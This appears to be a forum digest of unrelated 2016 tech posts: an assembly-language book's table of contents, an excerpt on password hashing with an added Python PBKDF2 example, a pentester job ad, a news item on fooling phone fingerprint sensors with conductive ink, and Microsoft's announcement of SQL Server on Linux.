The Art of Assembly Language

Volume One: Data Representation
Chapter One: Foreword
Chapter Two: Hello, World of Assembly Language
Chapter Three: Data Representation
Chapter Four: More Data Representation
Chapter Five: Questions, Projects, and Lab Exercises

Volume Two: Machine Architecture
Chapter One: System Organization
Chapter Two: Memory Access and Organization
Chapter Three: Introduction to Digital Design
Chapter Four: CPU Architecture
Chapter Five: Instruction Set Architecture
Chapter Six: Memory Architecture
Chapter Seven: The I/O Subsystem
Chapter Eight: Questions, Projects, and Labs

Volume Three: Basic Assembly Language
Chapter One: Constants, Variables, and Data Types
Chapter Two: Introduction to Character Strings
Chapter Three: Characters and Character Sets
Chapter Four: Arrays
Chapter Five: Records, Unions, and Name Spaces
Chapter Six: Dates and Times
Chapter Seven: Files
Chapter Eight: Introduction to Procedures
Chapter Nine: Managing Large Programs
Chapter Ten: Integer Arithmetic
Chapter Eleven: Real Arithmetic
Chapter Twelve: Calculation Via Table Lookups
Chapter Thirteen: Questions, Projects, and Labs

Volume Four: Intermediate Assembly Language
Chapter One: Advanced High Level Control Structures
Chapter Two: Low-Level Control Structures
Chapter Three: Intermediate Procedures
Chapter Four: Advanced Arithmetic
Chapter Five: Bit Manipulation
Chapter Six: The String Instructions
Chapter Seven: The HLA Compile-Time Language
Chapter Eight: Macros
Chapter Nine: Domain Specific Embedded Languages
Chapter Ten: Classes and Objects
Chapter Eleven: The MMX Instruction Set
Chapter Twelve: Mixed Language Programming
Chapter Thirteen: Questions, Projects, and Labs

Section Five: Advanced Assembly Language Programming
Chapter One: Thunks
Chapter Two: Iterators
Chapter Three: Coroutines and Generators
Chapter Four: Low-level Parameter Implementation
Chapter Five: Lexical Nesting
Chapter Six: Questions, Projects, and Labs

Appendix A: Answers to Selected Exercises
Appendix B: Console Graphic Characters
Appendix D: The 80x86 Instruction Set
Appendix E: The HLA Language Reference
Appendix F: The HLA Standard Library Reference
Appendix G: HLA Exceptions
Appendix H: HLA Compile-Time Functions
Appendix I: Installing HLA on Your System
Appendix J: Debugging HLA Programs
Appendix K: Comparing HLA and MASM
Appendix L: HLA Code Generation for HLL Statements

Download: http://portal.aauj.edu/portal_resources/downloads/programming/assembly_language32bit_edition.pdf
-
Password Hashing: Why and How

posted March 7, 2016 by "No Bugs" Hare, translated by Sergey Ignatchenko, originally published in Overload #129 in October 2015
Author: “No Bugs” Hare

[[About Vol.2 of the upcoming “Development and Deployment of MMOG” book. There is no need to worry, I just need some time to prepare for publishing of Vol.1. “beta” chapters of Vol.2 are planned to start appearing in 3 weeks from now. Stay tuned!]]

Password hashing is a non-trivial topic, which has recently become quite popular. While it is certainly not the only thing which you need to do to make your network app secure, it is one of those security measures every security-conscious developer should implement. In this article, we’ll discuss what it is all about, why hash functions need to be slow, and how password hashing needs to be implemented in your applications.

What is it all about?

Whenever we’re speaking about security, there is always the question: what exactly is the threat we’re trying to protect ourselves from? For password hashing, the answer is very unpleasant: we’re trying to mitigate the consequences arising from stealing the whole of your site’s password database. This is usually accompanied by the potential for stealing pretty much any other data in your database, and represents the Ultimate Nightmare of any real-world security person.

Some (including myself) will argue that such mitigation is akin to locking the stable door after the horse has bolted, and that security efforts should be directed towards preventing the database-stealing from happening in the first place. While I certainly agree with this line of argument, on the other hand implementing password hashing is so simple and takes so little time (that is, if you designed for it from the very beginning) that it is simply imprudent not to implement it.

Not to mention that if you’re not doing password hashing, everybody (your boss and any code reviewers/auditors included) will say, “Oh, you don’t do password hashing, which is The Second Most Important Security Feature In The Universe (after encryption, of course).” The most important thing, however, is not to forget about a dozen other security-related features which also need to be implemented (such as TLS encryption, not allowing passwords which are listed in well-known password dictionaries, limits on login rate, etc. etc. – see the ‘Bottom Line’ section below for some of these).

Full article: http://ithare.com/password-hashing-why-and-how/
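What "designed for it from the very beginning" looks like in practice, as an added example that is not code from the article: a salted, deliberately slow PBKDF2-HMAC-SHA256 record with a self-describing format, constant-time verification, and a transparent cost upgrade at login so the work factor can be raised as hardware gets faster. The record layout, the default iteration count and the function names are assumptions for this example.

```python
"""Salted, slow password hashing with upgrade-on-login (added example)."""
import hashlib
import hmac
import os
from typing import Optional, Tuple

DEFAULT_ITERATIONS = 600_000  # assumed cost; tune so one hash takes roughly 0.1-0.3 s on your servers
SALT_BYTES = 16
ALGO = "pbkdf2_sha256"


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: algo$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)  # fresh random salt per password: equal passwords give different records
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return f"{ALGO}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the record's own salt and cost; compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = record.split("$")
        if algo != ALGO:
            return False
        iterations = int(iters)
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
    except ValueError:
        return False  # malformed record: never accept
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return hmac.compare_digest(candidate, expected)


def needs_rehash(record: str, minimum_iterations: int = DEFAULT_ITERATIONS) -> bool:
    """True when the stored record is below the cost the current policy requires."""
    parts = record.split("$")
    return len(parts) != 4 or parts[0] != ALGO or int(parts[1]) < minimum_iterations


def check_and_upgrade(password: str, record: str,
                      target_iterations: int = DEFAULT_ITERATIONS) -> Tuple[bool, Optional[str]]:
    """Login helper: (ok, new_record). new_record is only set when the password
    verified and the stored cost is below target, so the caller can rewrite the
    record now, while the cleartext password is legitimately in hand."""
    if not verify_password(password, record):
        return False, None
    if needs_rehash(record, target_iterations):
        return True, hash_password(password, target_iterations)
    return True, None


if __name__ == "__main__":
    rec = hash_password("correct horse battery staple")
    print(rec)
    print(verify_password("correct horse battery staple", rec), verify_password("Tr0ub4dor&3", rec))
```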
-
We are looking for Junior Pentester(s). If anyone is interested, I am waiting for a PM. Requirements: - Passion.
-
The fingerprint sensor on phones can be fooled with a sheet of paper

Locking your personal smartphone with a biometric sensor is one of the most secure protection methods for such devices. Many have tried to break this protection using various expensive methods, but until now printing the fingerprint on a sheet of paper has not had much success. It turns out the idea was good, but the equipment was not capable enough to produce a fake fingerprint. The solution? A printer that leaves conductive ink on the paper.

Full article and video: http://www.go4it.ro/telefoane-mobile/senzorul-de-amprenta-de-pe-telefoane-poate-fi-pacalit-cu-o-foaie-de-hartie-15100336/
-
Announcing SQL Server on Linux
Posted March 7, 2016
By Scott Guthrie - Executive Vice President, Cloud and Enterprise Group, Microsoft

It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers:

- Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection
- In-memory database support for every workload with performance increases up to 30-100x
- Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and the #1 SAP SD Two-Tier performance benchmark on Windows
- Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices
- Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data
- Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility

These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud. In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform.

Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms.

Extending SQL Server to Also Now Run on Linux

Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017.

SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in.

“This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.”

“SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.”

“We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.”

Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we also announced Microsoft R Server, our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata.

The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market.

Please join me, Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data.

Thanks,
Scott

Source: https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/